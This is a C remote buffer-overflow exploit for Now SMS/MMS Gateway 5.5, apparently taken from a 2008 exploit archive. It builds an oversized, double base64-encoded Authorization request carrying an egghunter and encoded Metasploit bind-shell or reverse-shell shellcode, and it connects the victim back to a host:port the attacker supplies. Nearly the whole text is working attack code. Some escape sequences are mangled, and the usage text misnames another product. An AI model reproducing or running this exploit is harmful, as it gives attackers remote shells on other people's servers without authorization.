[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Now SMS/MMS Gateway 5.5 Remote Buffer Overflow Exploit
# Published : 2008-05-29
# Author : Heretic2
# Previous Title : ASUS DPC Proxy 2.0.0.16/19 Remote Buffer Overflow Exploit
# Next Title : Creative Software AutoUpdate Engine ActiveX Stack Overflow Exploit
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Now SMS/MMS Gateway v5.5 and others
* ----------------------------------------
* Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit
* Exploit date : 14.04.2008
* Exploit writer : Heretic2 (heretic2x@gmail.com)
* OS : Windows ALL
* Tested : Windows 2000 Server
* Crew : Dreatica-FXP
* Location : http://www.milw0rm.com/
* ----------------------------------------
* Info : We obtain EIP after sending a long Authentificate request to server
* Egghunter help here.
* ----------------------------------------
* Thanks to:
* 1. Luigi Auriemma ( http://aluigi.org <aluigi [at] autistici.org> )
* 2. The Metasploit project ( http://metasploit.com )
* 3. ALPHA 2: Zero-tolerance ( <skylined [at] edup.tudelft.nl> )
* 4. Dreatica-FXP crew ( )
************************************************************************************
* This was written for educational purpose only. Use it at your own risk. Author will be not be
* responsible for any damage, caused by that code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
void usage(char * s);
void logo();
void end_logo();
void print_info_banner_line(const char * key, const char * val);
void extract_ip_and_port( char * &remotehost, int * port, char * str);
int fill_payload_args(int sh, int bport, char * reverseip, int reverseport, struct h2readyp * xx);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret);
int hr2_connect(char * remotehost, int port, int timeout);
int hr2_udpconnect(char * remotehost, int port, struct sockaddr_in * addr, int timeout);
int hr2_updsend(char * remotehost, unsigned char * buf, unsigned int len, int port, struct sockaddr_in * addr, int timeout);
int execute(struct _buf * abuf, char * remotehost, int port);
struct _buf
{
unsigned char * ptr;
unsigned int size;
};
int construct_shellcode(int sh, struct _buf * shf, int target,char * rerverseip, int reverseport);
int construct_buffer(struct _buf * shf, int target, struct _buf * abuf);
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg; // global argument pointer
int optind = 0, opterr; // global argv index
// -----------------------------------------------------------------
// -----------------------------------------------------------------
struct {
const char * name;
int length;
char *shellcode;
}shellcodes[]={
{"Bindshell, port 4444 [ args: none ]", 696,
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"xebx03x59xebx05xe8xf8xffxffxffx49x49x37x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"
"x58x50x30x42x31x41x42x6bx42x41x52x42x32x42x41x32"
"x41x41x30x41x41x58x50x38x42x42x75x6ax49x4bx4cx62"
"x4ax68x6bx30x4dx59x78x49x69x4bx4fx79x6fx69x6fx71"
"x70x4ex6bx32x4cx51x34x64x64x6ex6bx41x55x77x4cx4c"
"x4bx71x6cx35x55x64x38x54x41x58x6fx4cx4bx30x4fx47"
"x68x4ex6bx53x6fx47x50x74x41x58x6bx70x49x4cx4bx35"
"x64x6cx4bx36x61x68x6ex57x41x79x50x6fx69x4cx6cx6c"
"x44x4bx70x63x44x43x37x5ax61x78x4ax44x4dx36x61x6a"
"x62x38x6bx78x74x77x4bx51x44x74x64x76x48x51x65x4a"
"x45x4ex6bx73x6fx61x34x55x51x5ax4bx71x76x6cx4bx64"
"x4cx72x6bx4ex6bx63x6fx57x6cx75x51x7ax4bx33x33x34"
"x6cx6cx4bx6ex69x72x4cx45x74x45x4cx30x61x4fx33x50"
"x31x69x4bx61x74x6cx4bx57x33x66x50x4ex6bx43x70x64"
"x4cx6ex6bx32x50x65x4cx6ex4dx6ex6bx77x30x67x78x31"
"x4ex33x58x6cx4ex30x4ex34x4ex5ax4cx50x50x4bx4fx69"
"x46x72x46x62x73x70x66x35x38x57x43x35x62x45x38x30"
"x77x63x43x44x72x71x4fx71x44x79x6fx4ax70x73x58x78"
"x4bx48x6dx4bx4cx77x4bx56x30x79x6fx7ax76x51x4fx6f"
"x79x79x75x32x46x4bx31x48x6dx43x38x45x52x70x55x73"
"x5ax33x32x6bx4fx4ax70x72x48x69x49x36x69x4cx35x6e"
"x4dx50x57x4bx4fx6ax76x36x33x36x33x61x43x33x63x62"
"x73x43x73x36x33x50x43x63x63x4bx4fx68x50x43x56x71"
"x78x62x31x51x4cx30x66x30x53x6bx39x78x61x4cx55x65"
"x38x4ex44x67x6ax74x30x6fx37x70x57x69x6fx6ex36x32"
"x4ax36x70x43x61x32x75x79x6fx4ex30x50x68x4fx54x6e"
"x4dx64x6ex6dx39x52x77x79x6fx58x56x66x33x36x35x69"
"x6fx4ex30x45x38x38x65x72x69x6bx36x77x39x33x67x79"
"x6fx6ex36x70x50x31x44x62x74x73x65x6bx4fx58x50x6d"
"x43x50x68x4bx57x44x39x4fx36x64x39x71x47x6bx4fx49"
"x46x63x65x6bx4fx4ax70x71x76x50x6ax50x64x50x66x70"
"x68x50x63x52x4dx6ex69x58x65x32x4ax46x30x63x69x45"
"x79x48x4cx4cx49x7ax47x63x5ax70x44x4dx59x78x62x36"
"x51x39x50x38x73x4fx5ax6bx4ex41x52x64x6dx6bx4ex32"
"x62x36x4cx4ex73x4cx4dx43x4ax34x78x4cx6bx6ex4bx6e"
"x4bx51x78x70x72x6bx4ex4ex53x47x66x4bx4fx32x55x50"
"x44x4bx4fx7ax76x43x6bx70x57x62x72x46x31x66x31x32"
"x71x30x6ax35x51x33x61x32x71x33x65x53x61x4bx4fx5a"
"x70x30x68x6ex4dx6ex39x73x35x7ax6ex62x73x4bx4fx48"
"x56x63x5ax6bx4fx59x6fx57x47x39x6fx6ex30x4ex6bx30"
"x57x59x6cx4bx33x38x44x45x34x59x6fx39x46x50x52x39"
"x6fx58x50x65x38x38x70x6ex6ax37x74x53x6fx31x43x6b"
"x4fx6ax76x6bx4fx78x50x42"
},
{"ReverseShell [ args: -R <ip:port> ]",
287,
/*
* windows/shell_reverse_tcp - 287 bytes
* http://www.metasploit.com
* Encoder: generic/none
*/
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8b"
"x45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01"
"xebx49x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07"
"xc1xcax0dx01xc2xebxf4x3bx54x24x28x75xe5x8bx5f"
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xebx03x2cx8b"
"x89x6cx24x1cx61xc3x31xdbx64x8bx43x30x8bx40x0c"
"x8bx70x1cxadx8bx40x08x5ex68x8ex4ex0execx50xff"
"xd6x66x53x66x68x33x32x68x77x73x32x5fx54xffxd0"
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66x81xedx08"
"x02x55x6ax02xffxd0x68xd9x09xf5xadx57xffxd6x53"
"x53x53x53x43x53x43x53xffxd0x68x7fx00x00x01x66"
"x68x11x5cx66x53x89xe1x95x68xecxf9xaax60x57xff"
"xd6x6ax10x51x55xffxd0x66x6ax64x66x68x63x6dx6a"
"x50x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95"
"x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxabx68"
"x72xfexb3x16xffx75x28xffxd6x5bx57x52x51x51x51"
"x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53xff"
"xd6x6axffxffx37xffxd0x68xe7x79xc6x79xffx75x04"
"xffxd6xffx77xfcxffxd0x68xf0x8ax04x5fx53xffxd6"
"xffxd0"
},
{NULL, 0, NULL}
};
struct _target{
const char *t ;
unsigned long ret ;
} targets[]=
{
{"Now SMS/MMS Gateway universal", 0x10002f9d },
{"Now SMS/MMS Gateway v5.5", 0x0027727c },
{"DOS/Crash/Debug/Test/Fun", 0x41414141 },
{NULL, 0x00000000 }
};
char egghunter[] =
"x33xd2x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05"
"x5ax74xefxb8x44x46x58x50x8bxfaxafx75xeaxafx75xe7"
"xffxe7";
char header_b[] =
"GET / HTTP/1.0rn"
"User-Agent: ";
char header_m[] ="rn"
"Authorization: Basic ";
char header_e[] = "rnrn";
// memory for buffers
unsigned char payloadbuffer[10000], a_buffer[10000];
long dwTimeout=5000;
int timeout=5000;
// alphanumeric decoder took from "ALPHA 2: Zero-tolerance." code
char alphanum_decoder[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42"
"x30x42x42x41x42x58x50x38x41x42x75x4ax49";
// alphanumeric encoder took from "ALPHA 2: Zero-tolerance." code
int alphanumeric_exec(char *to_encode, int len, char *encoded, int * rlen )
{
int i,ii=0, input, A, B, C, D, E, F, length=(int)strlen(to_encode);
char* valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; // mixed chars
char temp[10];
memset(temp, 0 , sizeof(temp));
srand((int)clock());
for(ii=0;ii<len;ii++)
{
input = to_encode[ii];
A = (input & 0xf0) >> 4;
B = (input & 0x0f);
F = B;
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != F) { i = ++i % ((int)strlen(valid_chars)); }
E = valid_chars[i] >> 4;
D = (A^E);
i = rand() % ((int)strlen(valid_chars));
while ((valid_chars[i] & 0x0f) != D) { i = ++i % ((int)strlen(valid_chars)); }
C = valid_chars[i] >> 4;
sprintf(temp,"%c%c", (C<<4)+D, (E<<4)+F);
encoded[strlen(encoded)]=temp[0];
encoded[strlen(encoded)]=temp[1];
}
encoded[strlen(encoded)]='A';
*rlen=(int)strlen(encoded);
return 1;
}
int main(int argc, char **argv)
{
char c,*remotehost=NULL,*file=NULL,*reverseip=NULL,*url=NULL,temp1[100];
int HAVE_R=0,HAVE_U=0,sh,port=8800,itarget=0,reverseport=9999;
struct _buf fshellcode, sbuffer;
logo();
if(argc<2)
{
usage(argv[0]);
return -1;
}
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
// set defaults
sh=0;
// ------------
while((c = getopt(argc, argv, "h:t:R:T:"))!= EOF)
{
switch (c)
{
case 'h':
if (strchr(optarg,':')==NULL)
{
remotehost=optarg;
}else
{
sscanf(strchr(optarg,':')+1, "%d", &port);
remotehost=optarg;
*(strchr(remotehost,':'))='�';
}
break;
case 't':
sscanf(optarg, "%d", &itarget);
itarget--;
break;
case 'R':
HAVE_R=1;
if (strchr(optarg,':')==NULL)
{
reverseip=optarg;
}else
{
sscanf(strchr(optarg,':')+1, "%d", &reverseport);
reverseip=optarg;
*(strchr(reverseip,':'))='�';
}
break;
case 'T':
sscanf(optarg, "%ld", &dwTimeout);
break;
default:
usage(argv[0]);
WSACleanup();
return -1;
}
}
sh=HAVE_R;
if(remotehost == NULL)
{
printf(" [-] Please enter remotehostn");
end_logo();
WSACleanup();
return -1;
}
print_info_banner_line("Host", remotehost);
sprintf(temp1, "%d", port);
print_info_banner_line("Port", temp1);
print_info_banner_line("Payload", shellcodes[sh].name);
if(sh==0)
{
sprintf(temp1, "%d", 4444);
print_info_banner_line("BINDPort", temp1);
}
if(sh==1)
{
print_info_banner_line("CB IP", reverseip);
sprintf(temp1, "%d", reverseport);
print_info_banner_line("CB port", temp1);
}
printf(" # ------------------------------------------------------------------- # n");
fflush(stdout);
memset(payloadbuffer, 0, sizeof(payloadbuffer));
fshellcode.ptr=payloadbuffer;
fshellcode.size=0;
memset(a_buffer, 0, sizeof(a_buffer));
sbuffer.ptr=a_buffer;
sbuffer.size=0;
if(!construct_shellcode(sh, &fshellcode, itarget, reverseip, reverseport))
{
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Payload constructedn");
if(!construct_buffer(&fshellcode, itarget, &sbuffer))
{
printf(" [-] Buffer not constructedn");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Final buffer constructedn");
if(!execute(&sbuffer, remotehost, port))
{
printf(" [-] Buffer not sentn");
end_logo();
WSACleanup();
return -1;
}
printf(" [+] Buffer sentn");
end_logo();
WSACleanup();
return 0;
}
int construct_shellcode(int sh, struct _buf * shf, int target, char * rerverseip, int reverseport)
{
int x;
char fsh[1000];
memcpy(shf->ptr, shellcodes[sh].shellcode, shellcodes[sh].length);
shf->size=shellcodes[sh].length;
if(sh==1)
{
memset(shf->ptr,0,shf->size+1);
memset(fsh,0,sizeof(fsh));
memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
static struct hostent *host = gethostbyname(rerverseip);
static struct sockaddr_in addr;
if(host == NULL)
{
printf(" [-] Reverse ip/hostanme is invalidn");
return 0;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
fsh[160] = (addr.sin_addr.S_un.S_un_b.s_b1) ;
fsh[161] = (addr.sin_addr.S_un.S_un_b.s_b2) ;
fsh[162] = (addr.sin_addr.S_un.S_un_b.s_b3) ;
fsh[163] = (addr.sin_addr.S_un.S_un_b.s_b4) ;
fsh[166] = ((reverseport >> 8) & 0xff) ;
fsh[167] = ((reverseport ) & 0xff) ;
memcpy(shf->ptr,alphanum_decoder,sizeof(alphanum_decoder)-1);
alphanumeric_exec(fsh, shellcodes[sh].length, (char*)(shf->ptr+sizeof(alphanum_decoder)-1), &x);
shf->size = sizeof(alphanum_decoder)-1+x;
}
return 1;
}
int construct_buffer(struct _buf * shf, int target, struct _buf * sbuf)
{
unsigned char * cp, *lp ;
char buf[10000],encoded[10000],encoded2[10000], useragent[10000];
int len, slen;
//
cp=(unsigned char *)useragent;
*cp++ = 'x44';
*cp++ = 'x46';
*cp++ = 'x58';
*cp++ = 'x50';
*cp++ = 'x44';
*cp++ = 'x46';
*cp++ = 'x58';
*cp++ = 'x50';
*cp++ = 'x41';
*cp++ = 'x41';
*cp++ = 'x41';
memcpy(cp, shf->ptr, shf->size);
cp+=shf->size;
slen=(int)(cp-(unsigned char *)useragent);
// make egghunter
memset(buf, 0, sizeof(buf));
memset(encoded, 0, sizeof(encoded));
memset(encoded2, 0, sizeof(encoded2));
cp=(unsigned char *)buf;
memset(cp, 'x41', 129);
cp+=129;
*cp++ = (unsigned char)((targets[target].ret ) & 0xff);
*cp++ = (unsigned char)((targets[target].ret >> 8) & 0xff);
*cp++ = (unsigned char)((targets[target].ret >> 16) & 0xff);
*cp++ = (unsigned char)((targets[target].ret >> 24) & 0xff);
*cp++ = 'x90';
*cp++ = 'x90';
*cp++ = 'x90';
*cp++ = 'x90';
memcpy(cp, egghunter, strlen(egghunter));
cp+=strlen(egghunter);
memset(cp, 'x42', 500);
cp+=500;
len=(int)(cp-(unsigned char * )buf);
base64_encode((const unsigned char *)buf,len,(char *)encoded);
base64_encode((const unsigned char *)encoded,strlen(encoded),(char *)encoded2);
// ---
cp = sbuf->ptr;
memcpy(cp, header_b,strlen(header_b));
cp+=strlen(header_b);
memcpy(cp, useragent,slen);
cp+=slen;
memcpy(cp, header_m,strlen(header_m));
cp+=strlen(header_m);
memcpy(cp, encoded2,strlen(encoded2));
cp+=strlen(encoded2);
memcpy(cp, header_e,strlen(header_e));
cp+=strlen(header_e);
sbuf->size=(int)(cp-sbuf->ptr);
return 1;
}
void extract_ip_and_port( char * &remotehost, int * port, char * str)
{
if (strchr(str,':')==NULL)
{
remotehost=str;
}else
{
sscanf(strchr(str,':')+1, "%d", port);
remotehost=str;
*(strchr(remotehost,':'))='�';
}
}
int hr2_connect(char * remotehost, int port, int timeout)
{
SOCKET s;
struct hostent *host;
struct sockaddr_in addr;
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set x;
int res;
if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}
host = gethostbyname(remotehost);
if (!host) return SOCKET_ERROR;
addr.sin_addr = *(struct in_addr*)host->h_addr;
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == SOCKET_ERROR)
{
closesocket(s);
return SOCKET_ERROR;
}
unsigned long l = 1;
ioctlsocket( s, FIONBIO, &l ) ;
connect(s, (struct sockaddr*)&addr, sizeof(addr));
FD_ZERO(&x);
FD_SET(s, &x);
res = select(NULL,NULL,&x,NULL,pstTime);
if(res< 0) return SOCKET_ERROR;
if(res==0) return 0;
return (int)s;
}
int hr2_tcpsend(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
return send(s, (char *)buf, len, 0);
}
int hr2_tcprecv(SOCKET s, unsigned char * buf, unsigned int len, int timeout)
{
TIMEVAL stTime;
TIMEVAL *pstTime = NULL;
fd_set xy;
int res;
if (INFINITE != timeout)
{
stTime.tv_sec = timeout / 1000;
stTime.tv_usec = timeout % 1000;
pstTime = &stTime;
}
FD_ZERO(&xy);
FD_SET(s, &xy);
res = select(NULL,&xy,NULL,NULL,pstTime);
if(res==0) return 0;
if(res<0) return -1;
return recv(s, (char *)buf, len, 0);
}
int execute(struct _buf * abuf, char * remotehost, int port)
{
int x;
SOCKET s ;
s = hr2_connect(remotehost, port, 10000);
if(s==0)
{
printf(" [-] connect() timeoutn");
return 0;
}
if(s==SOCKET_ERROR)
{
printf(" [-] Connection failedn");
return 0;
}
x = hr2_tcpsend(s, abuf->ptr, abuf->size, 0);
printf(" [+] Sent %d out of %d bytesn", x, abuf->size);
closesocket(s);
return 1;
}
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring)
{
static char *next = NULL;
if (optind == 0)
next = NULL;
optarg = NULL;
if (next == NULL || *next == '�')
{
if (optind == 0)
optind++;
if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '�')
{
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
if (strcmp(argv[optind], "--") == 0)
{
optind++;
optarg = NULL;
if (optind < argc)
optarg = argv[optind];
return EOF;
}
next = argv[optind];
next++; // skip past -
optind++;
}
char c = *next++;
char *cp = strchr(optstring, c);
if (cp == NULL || c == ':')
return '?';
cp++;
if (*cp == ':')
{
if (*next != '�')
{
optarg = next;
next = NULL;
}
else if (optind < argc)
{
optarg = argv[optind];
optind++;
}
else
{
return '?';
}
}
return c;
}
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// -----------------------------------------------------------------
// BASE64
// -----------------------------------------------------------------
char base64_chars[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz"
"0123456789+/";
static inline bool is_base64(unsigned char c) {
return (isalnum(c) || (c == '+') || (c == '/'));
}
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret)
{
int i = 0;
int j = 0;
unsigned char char_array_3[3];
unsigned char char_array_4[4];
while (in_len--)
{
char_array_3[i++] = *(bytes_to_encode++);
if (i == 3) {
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for(i = 0; (i <4) ; i++)
ret[strlen(ret)]=base64_chars[char_array_4[i]];
i = 0;
}
}
if (i)
{
for(j = i; j < 3; j++)
char_array_3[j] = '�';
char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
char_array_4[3] = char_array_3[2] & 0x3f;
for (j = 0; (j < i + 1); j++)
ret[strlen(ret)]=base64_chars[char_array_4[j]];
while((i++ < 3))
ret[strlen(ret)]='=';
}
}
// -----------------------------------------------------------------
// End of BASE64
// -----------------------------------------------------------------
void print_info_banner_line(const char * key, const char * val)
{
char temp1[100], temp2[100];
memset(temp1,0,sizeof(temp1));
memset(temp1, 'x20' , 58 - strlen(val) -1);
memset(temp2,0,sizeof(temp2));
memset(temp2, 'x20' , 8 - strlen(key));
printf(" # %s%s: %s%s# n", key, temp2, val, temp1);
}
void usage(char * s)
{
int j;
printf("n");
printf(" Usage: %s -h <host:port> -t <target> -R <host:port>n", s);
printf(" -------------------------------------------------------------------n");
printf(" Arguments:n");
printf(" -h ........ host to attack, default port: 8800n");
printf(" -t ........ target to usen");
printf(" -R ........ host and port for back connectn");
printf(" -T ........ socket timeoutn");
printf("n");
printf(" Supported ASUS DPCProxy versions:n");
for(j=0; targets[j].t!=0;j++)
{
printf(" %d. %sn",j+1, targets[j].t);
}
printf("n");
for(j=0; shellcodes[j].name!=0;j++)
{
printf(" %d. %sn",j+1, shellcodes[j].name);
}
end_logo();
}
void logo()
{
printf("nn");
printf(" ####################################################################### n");
printf(" # ____ __ _ ______ __ _____ #n");
printf(" # / __ \________ _____/ /_(_)_________ / __/\ \/ / / _ / #n");
printf(" # / / / / ___/ _ \/ __ / __/ / ___/ __ / ___ / / \ / / // / #n");
printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \ / ___/ #n");
printf(" # /_____/_/ \___/ \_,_/\__/_/\___/\__,_/ /_/ /_/\_\/_/ #n");
printf(" # crew #n");
printf(" ####################################################################### n");
printf(" # Exploit : Now SMS/MMS Gateway v5.5 Remote Buffer Overflow Exploit # n");
printf(" # Author : Heretic2 (http://www.dreatica.cl/) # n");
printf(" # Version : 1.0 # n");
printf(" # System : Windows ALL # n");
printf(" # Date : 14.04.2008 # n");
printf(" # ------------------------------------------------------------------- # n");
}
void end_logo()
{
printf(" # ------------------------------------------------------------------- # n");
printf(" # Dreatica-FXP crew [Heretic2] # n");
printf(" ####################################################################### nn");
}
// www.Syue.com [2008-05-29]